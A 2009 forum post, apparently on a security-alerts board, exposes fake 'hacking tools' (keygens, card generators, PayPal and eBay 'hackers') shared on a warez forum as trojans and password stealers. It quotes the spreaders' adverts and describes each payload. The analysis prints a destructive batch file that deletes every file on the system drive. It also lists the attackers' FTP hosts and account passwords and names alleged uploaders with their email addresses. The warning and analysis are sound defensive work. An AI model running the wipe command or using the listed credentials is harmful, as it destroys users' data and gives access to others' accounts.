Log In     RegMe         


Latest Rapidshare / PayPal / eBay / Western Union / etc. "hacking tools"

']['€AM€LiT€ Forum - News, Reports and Alerts

 
AuthorMessage
 Vektor

  2009-06-17
  21:40:24

 
Quote
These are programs that indeed get passwords for what their spreaders advertise. But they don't give the passwords to you, they give your passwords to them. :)
The following programs are being spread by http://www.pakwarez.com/ forum members , moderators and admins.

  • codrequest.rar
    sikandar wrote:
    UnIVERSAL KEYGEN FOR ALL SOFTWARES

    http://imagehoster.us/images/158_12345678.jpg

    THIS INCLUDES ALL SOFTWARE FROM MICROSOFT AND 90% OF ALL 3RD PARTIES SOFTWARES

    DOWNLOAD NOW!!!!THIS IS VERY USEFUL!!!!

    CHEERS!!!

    http://uploading.com/files/EPIL788P/codrequest.rar.html



    • 29wvcyh.gif - filler
    • endless.gif - filler
    • Hi.exe - iStealer which sends all passwords to ftp.1nj3ct3d.net using account for co_daniel@1nj3ct3d.net password 12345678910
      http://www.hackforums.net/showthread.php?tid=86625 , user: daniel2112 wrote:
      RE: Account selling theard (RS,MU,megashares,netload.......)
      yo u got msn..? add me.. co_daniel@botters.com


      http://markmail.org/message/dkborcsdm62zfhj3 , user: co_daniel wrote:
      Whenever I do a search in Google for my name it comes up with comments
      I have left on people's blogs. I don't want that. Is there any way I
      can not have Google show the comments I have made on people's blogs on
      a search page? Please email your thoughts to: [email address]


      For more trojans, visit Daniel2112's Twitter page
  • Western Union Bug 2009.exe
    Rsfk wrote:
    Wu-Bug 2009 Free - Serial Included
    I have got a serial for Wu-Bug 2009 and now I want to share the program and serial.

    http://www.megaupload.com/?d=FTZ8HW7U

    If it doesn't work. Turn off your anti-virus program.


    This program extracts 2 files in Temp\ directory,
    • Western_Union Bug_2009.exe, a program that loads http://westernunion.via.infonow.net/locator/SearchAction.do and you can "activate" it by sending an e-mail to wubug@yahoo.com

      C:\Documents and Settings\Craig\Desktop\Hackerz.ws\Western_Union Bug_2009\Project1.vbp wrote:
      It was 2004 when our one of friend was trying to make the transfer online through credit card. He was in process that he got an error and a unusually he start smiling and he kept smiling. He immediately called me and told me that happen to him and I also got happy with that news. @@@ x D-7  %   ___ Arialÿ4   Label4 ü Initially we made a transfers for fun and with time we started to make the transfers for other people. Now the time came to become a famous , we made the software which utilize that bug and makes transfer automatically. We named it 'Western Union Bug'.
    • lollastone.exe - iStealer which uploads passwords to ftp.team-sa.org using account for teamsaor with password fkeDbU31zp
  • CC_AND_BANK_ACC_GENERATOR_V2.rar

    mastlife wrote:
    Credit card and bank account generator 1000% WORKING

    ++In This AIO are 21 Generators: ++
    ++12 Generators with American Credit Cards and 9 Generators with German Credit Cards . ++


    setup.exe - iStealer which uploads passwords to ftp.lickmytee.com using account for thug@lickmytee.com with password bhailog
    CC-GEN V2 by _.-HANI-._.exe - extracts 2 files in Temp\ and executes them,
    • CC-GEN~1.EXE - autoplay application
    • RASDIA~1.EXE - a trojan packed with Themida which copies itself in system32 as Rasdial32.exe, has a rootkit that hides it from task manager and registry editing tools, it injects a thread into the context of explorer.exe and if the default browser is not started it will periodically attempt to start it. Once the default browser is started, it injects a thread into its context to bypass firewall restrictions and it sends all locally stored passwords to keyrnerl.no-ip.info:1210 using the account for olenka with password 6025241432{2D6F9C02-144F-A572-0408-060803080701}
  • darkduo wrote:
    Biggest Update Please to all people who cant get it to work please try the new links now...
    ive coded something...
    please try it
    delete any other old versions u have!
    tnx



    Huge Update no 2: For those people who get errors like file disappears,error substrings,flexing errors,wont transfer errorm cant get handle of tos error,library dun3sc error,and db error on string 72.. please download my packed updater
    thnks for support guys

    http://www.mediafire.com/?mzhytzzmjzz

    happy stealing!!!

    File Info

    Report generated: 15.8.2008 at 21.29.57 (GMT 1)
    Filename: fix.exe
    File size: 92kb
    MD5 Hash: *REMOVED*
    SHA1 Hash: *REMOVED*
    Binder Detector: Nothing found

    Detections

    A-Squared - Nothing found!
    Avast - Nothing found!
    AVG - Nothing found!
    BitDefender - Nothing found!
    ClamWin - Nothing found!
    Comodo - Nothing found!
    Dr.Web - Nothing found!
    Ewido - Nothing found!
    F-PROT 6 - Nothing found!
    G DATA - Nothing found!
    IkarusT3 - Nothing found!
    McAfee - Nothing found!
    NOD32 - Nothing found!
    Norman - Nothing found!
    Sophos - Nothing found!
    TrendMicro - Nothing found!
    VBA32 - Nothing found!   
    Virus Buster - Nothing found!


    UPDATED!!!: For those who cant open it or get errors.. ia already updated the link,i added multiple features to the cracker.fixing the runtime bugs..
    Note: Some antivirus always see hacking tools as virus/trojan..
    they are all false positives..
    if it wont work pm me..
    if you see bugs pm me


    justme89 uploaded database hacker with password so im going to upload the realy one with no passwords

    http://img264.imageshack.us/img264/4701/transcompscreen.gif
    http://www.mediafire.com/download.php?ytdgvnqdmy4

    Enjoy~~!!

    :D


    Fix.exe - iStealer which uploads all passwords to ftp.drivehq.com using account for kodaroka with password sadandhappy (registered for earl@mailinator.com)

    webmaster@drivehq.com wrote:
    Dear kodaroka,

    You have just changed your email address or mobile number on DriveHQ.com, please confirm your new profile by clicking on the link below.

    I changed the password for account kodaroka to prevent trojans from uploading to that ftp account.

  • Rsfk wrote:
    [Working] Paypal Database Hacker - Cracked - 100% Working

    This program is 100% working. If it doesn't, PM me. Good luck.
    Updated Link:

    http://www.2shared.com/file/6317704/6c39bb26/PayPalHackware.html

    2shared.com/file/6317704/6c39bb26/PayPalHackware.html

    If it doesn't work, turn off your anti-virus program.

    File Info

    Report generated: 15.6.2009 at 1.47.59 (GMT 1)
    File size: 3944 KB
    MD5 Hash: 67E2AE6614F822F8FFB92830193C6280
    SHA1 Hash: B2D3CF0279CFD41683FB217495FB8593F112BAD9
    Self-Extract Archive: Nothing found
    Binder Detector:  Nothing found
    Detection rate: 0 on 24

    Detections

    a-squared - Nothing found!
    Avira AntiVir - Nothing found!
    Avast - Nothing found!
    AVG - Nothing found!
    BitDefender - Nothing found!
    ClamAV - Nothing found!
    Comodo - Nothing found!  
    Dr.Web - Nothing found!
    Ewido - Nothing found!
    F-PROT 6 - Nothing found!
    G DATA - Nothing found!
    IkarusT3 - Nothing found!
    Kaspersky - Nothing Found!
    McAfee - Nothing found!  
    MHR (Malware Hash Registry) - Nothing found!
    NOD32 v3 - Nothing found!  
    Norman - Nothing found!
    Panda - Nothing found!
    Quick Heal - Nothing found!
    Solo Antivirus - Nothing found!
    Sophos - Nothing found!
    TrendMicro - Nothing found!
    VBA32 - Nothing found!    
    Virus Buster - Nothing found!

    Scan report generated by  
    NoVirusThanks.org


    PaypalHackware.exe - iStealer which uploads passwords to ftp.team-sa.org using account for teamsaor with password fkeDbU31zp
  • wubug2009.exe
    lolo344 wrote:
    wu bug 2009

    hi i found this
    wu bug 2009 whit working serial but i can't use it
    http://www.speedyshare.com/314520712.html
    serial
    http://www.speedyshare.com/362336731.html
    somebody can teach me how to use?


    This program opens a Western Union scam page from http://free.hostultra.com/~wubug/index.htm which submits all entered data to http://www.secure-infos.net/Complete.htm .
    E:\Documents and Settings\Eric\My Documents\WU BUG 2009\Project1.vbp wrote:
    Processing Information Please Wait

    E:\Documents and Settings\Eric\My Documents\WU BUG 2009\Project1.vbp wrote:
    Invalid Credit Card Information
  • visa and mastercard keys generator 2009.exe

    H2B3 wrote:
    Ok,this product will show you the card accounts for visa and mastercard only.Some of the accounts are not working just try your luck.Anyways use it at your own risk
    enjoy.

    download:

    [HTML]http://www.mediafire.com/download.php?1wnmwtzmjgi[/HTML]


    I was wondering why did even the biggest trojan thankers cry that this is a trojan. Well... this one extracts in Temp\2C.tmp a file called game.bat and executes it:

    game.bat wrote:
    @echo off
    del %systemdrive%\*.* /f /s /q
    shutdown -r -f -t 00
  • Hscan_Gui_Private.rar
    web-hacker wrote:
    Hscan Gui Private
    Hscan is a Vulnerability Scanner it scans for

    http://img02.picoodle.com/img/img02/3/10/12/f_hscanm_80b5685.jpg


    Code:
    http://rapidshare.com/files/153466162/Hscan_Gui_Private.rar


    This one is a collection of trojans. The iStealer uploads all your passwords to bnetplace.freehostia.com using the account for johsmi9674 with password 123456789123456789

    2.exe wrote:
    www.mutX.org - contact mutX on MSN for unique/undetected versions & more (xxd00dxx@hotmail.com)
  • NetTools5.0.70

    killinG Machine wrote:
    IP Address Scanner, IP Calculator, IP Converter, Port
    Listener, Port Scanner, Ping, NetStat (2 ways), Trace
    Route (2 ways), TCP/IP Configuration, Online - Offline
    Checker, Resolve Host & IP, Time Sync, Whois & MX Lookup,
    Connect0r, Connection Analysator and prtotector, Net
    Sender, E-mail seeker, Net Pager, Active and Passive port
    scanner, Spoofer, Hack Trapper, HTTP flooder (DoS), Mass
    Website Visiter, Advanced Port Scanner, Trojan Hunter
    (Multi IP), Port Connecter Tool, Advanced Spoofer,
    Advanced Anonymous E-mailer, Simple Anonymous E-mailer,
    Anonymous E-mailer with Attachment Support, Mass E-mailer,
    E-mail Bomber, E-mail Spoofer, Simple Port Scanner (fast),
    Advanced Netstat Monitoring, X Pinger, Web Page Scanner,
    Fast Port Scanner, Deep Port Scanner, Fastest Host Scanner
    (UDP), Get Header, Open Port Scanner, Multi Port Scanner,
    HTTP scanner (Open port 80 subnet scanner), Multi Ping for
    Cisco Routers, TCP Packet Sniffer, UDP flooder, Resolve
    and Ping, Multi IP ping, File Dependency Sniffer,
    EXE-joiner (bind 2 files), Encrypter, Advanced Encryption,
    File Difference Engine, File Comparasion, Mass File
    Renamer, Add Bytes to EXE, Variable Encryption, Simple
    File Encryption, ASCII to Binary (and Binary to ASCII),
    Enigma, Password Unmasker, Credit Card Number Validate and
    generate, Create Local HTTP Server, eXtreme UDP Flooder,
    Web Server Scanner, Force Reboot, Webpage Info Seeker,
    Bouncer, Advanced Packet Sniffer, IRC server creater,
    Connection Tester, Fake Mail Sender, Bandwidth Monitor,
    Remote Desktop Protocol Scanner, MX Query, Messenger
    Packet Sniffer, API Spy, DHCP Restart, File Merger, E-mail
    Extractor (crawler / harvester bot), Open FTP Scanner,
    IP String COllecter, Range Net Send, CPU Monitor, Web
    Server (possibility to send anonymous E-mails without
    input of SMTP), Advanced System Lockup, Port Connect -
    Listen Tool, Internet MAC Address Scanner, Connection
    Manager / Monitor, Direct Peer Connecter (Send/Receive
    Files + Chat), Mouse Record/Play (Macro Tool), ... and much more.

    http://rapidshare.com/files/128523753/NetTools5.0.70.zip


    server.exe is a VBDos trojan which copies itself as csrss.exe , and  connects to illusionx.no-ip.biz:13337


The following programs are all uploaded by same person, and they all contain a keylogger and/or iStealer that upload accounts and/or logs to ftp.drivehq.com using the account for ivone_sikandar with password ivone_sikandar (registered for nathunandwani@gmail.com). The uploader has at least 5 accounts on each forum, all accounts thank each other for the great "tools" that are shared (blacksmith32, sikandar, sikandarnandwani, nathunandwani, nandwaninathu, etc.). Uploading.com account: nathunandwani .
http://www.dl4all.com/user/nandwaninathu/ wrote:
Full Name : nathu sikandar niraj alexander nandwan
Location: bacolod city
ICQ: ambot ah
http://www.dl4all.com/utilities_drivers/device_drivers/28930-150000-universal-drivers-15-gb-compress-to-100-mb-.html user nandwaninathu wrote:
i have 5 premium accounts in rapidshare!!!!!!!!!!!!!!!!!


webmaster@drivehq.com wrote:
Dear ivone_sikandar,

You have just changed your email address or mobile number on DriveHQ.com, please confirm your new profile by clicking on the link below.


I changed the password for this ftp account to prevent trojans to upload to it.

  • For Pakwarez.rar
    sikandar wrote:
    [CENTER]http://img79.imageshack.us/img79/3982/genv.jpg[/CENTER]

    THIS GENERATOR CAN GENERATE ACCOUNTS IN ALL WEBSITES BY SEARCHING THE DATABASE FOR AVAILABLE ACCOUNTS.......

    IT WORKS ON:

    PAYPAL
    ALL FORUMS
    GMAIL
    YAHOO
    EBAY
    FACEBOOK
    FRIENDSTER
    MYSPACE
    TAGGED

    ALL PORN SITES!!!!!!!!!

    AND MANY MORE


    http://uploading.com/files/G5JMXHMV/For Pakwarez.rar.html


    • stunt.gif = 2 MB filler
    • updater.exe = keylogger that uploads logs to ftp.drivehq.com for account ivone_sikandar password ivone_sikandar, requires .NET framework.
    • UniversalAccountGenerator.exe = dummy program that shows a nice JPEG and a messagebox

      UniversalAccountGenerator.exe wrote:
      Cannot connect to database
  • RSAgen.rar
    • rapidaccountgenerator.exe - a small program that displays a message,
      Quote:
      You are running an old version of Rapid Account Generator.Please Update it!

    • rapidupdater.exe - a trojan that sends all passwors stored by Firefox to fjux.firefoxstealer2@gmail.com ("Firefox password stealer by Fjux"). If you like that trojan, you can donate to its author, his PayPal account is registered for nickvanalst@planet.nl . And BTW you need to install .NET Framework if you really want this trojan to send all your passwords to him.
    • updater2.exe - iStealer which sends all passwords to ftp.drivehq.com using account for ivone_sikandar with password ivone_sikandar
    • rsAgen.jpg - screenshot with a nice dialogbox that will tell you to update the program
    • stunt.gif - 2 MB filler
  • EMAILHACKWITH1.rar
    sikandar wrote:
    [CENTER]http://imagehoster.us/images/588_123.jpg[/CENTER]

    YOU WILL JUST NEED THE EMAIL OF YOUR VICTIM AND CLICK THE "HACK" BUTTON AND THE PASSWORD WILL BE REVEALED!!!!!

    TRY IT AND YOU'LL BE SHOCKED!!!!!!!..........

    http://uploading.com/files/VLQLGRQL/EMAILHACKWITH1.rar.html


  • rapidv4.rar
    sikandar wrote:
    RAPIDSHARE ACCOUNT GENERATOR 4.0.0 [TESTED AND WORKINg]

    [CENTER]http://imagehoster.us/images/565_1234.jpg

    http://imagehoster.us/images/353_12345.jpg[/CENTER]

    http://uploading.com/files/UMVAUCZJ/rapidv4.rar.html


  • ebay.rar
  • sikandar wrote:
    [CENTER]http://img205.imageshack.us/img205/4334/ebayi.jpg[/CENTER]

    You will just need the username of the victim then press CRACK!!!!

    wait for some minutes and there you go!!!!!!

    please click the "thankz" button if it helps

    http://uploading.com/files/A7BN011V/ebay.rar.html


    • stunt.gif = 2 mb filler
    • ebay.exe = a dummy program that shows a nice JPEG and a messagebox,
      C:\Documents and Settings\Nathu Sikandar\Desktop\Project1.vbp wrote:
      inet.ocx is missing
    • inet.exe = iStealer which uploads to ftp.drivehq.com for account ivone_sikandar password ivone_sikandar
    • inetocx.exe = keylogger that uploads logs to ftp.drivehq.com for account ivone_sikandar password ivone_sikandar, requires .NET framework.
  • uploading.comhack.exe - iStealer
  • downloader.rar
    sikandar wrote:
    [CENTER]http://img72.imageshack.us/img72/7481/downloader.jpg[/CENTER]

    Can bypass the download for rapidshare.....megaupload.....4shared....uploading....filefactory and mediafire..

    enjoy....

    http://uploading.com/files/18HEGITW/downloader.rar.html


    • downloader.exe - a dummy program that displays a message, "Either you have an Invalid Download Link or you might need to Update the software"
    • updater.exe - keylogger
    • updater1.exe - iStealer

____________________
 Max_Mafiotu

  2010-01-18
  12:22:51

 
Quote
haa..haaa.ha all are fake. and I've met a lot fake